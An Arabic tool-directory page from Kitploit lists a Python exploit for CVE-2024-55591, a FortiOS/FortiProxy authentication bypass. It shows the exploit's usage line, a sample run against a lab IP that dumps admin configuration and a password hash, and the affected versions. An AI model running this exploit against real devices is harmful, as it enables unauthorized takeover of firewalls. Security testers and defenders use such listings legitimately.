Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
fortios-auth-bypass-exploit-CVE-2024-55591 — استغلال بلغة Python لثغرة CVE-2024-55591، تجاوز مصادقة FortiOS لتنفيذ أوامر عن بُعد على أجهزة FortiGate وFortiProxy المعرضة للخطر. | Kitploit
أدوات/GitHubGitHub/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubsysirq/fortios-auth-bypass-exploit-cve-2024-55591

fortios-auth-bypass-exploit-CVE-2024-55591

استغلال بلغة Python لثغرة CVE-2024-55591، تجاوز مصادقة FortiOS لتنفيذ أوامر عن بُعد على أجهزة FortiGate وFortiProxy المعرضة للخطر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
34منذ سنة واحدةلم تتم المراجعة بعد

CVE-2024-55591

أداة استغلال ثغرة تجاوز المصادقة في Fortinet FortiOS

الوصف

باستخدام هذه الأداة، يمكنك تجاوز المصادقة وتنفيذ الأوامر

الاستخدام

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py 
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t

عرض توضيحي

image-20250122220404985

image-20250122220502121

image-20250122220502121

المخرجات

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
    next
end

الإصدارات المتأثرة

  • FortiOS 7.0.0 حتى 7.0.16
  • FortiProxy 7.0.0 حتى 7.0.19
  • FortiProxy 7.2.0 حتى 7.2.12
تنزيل الأداة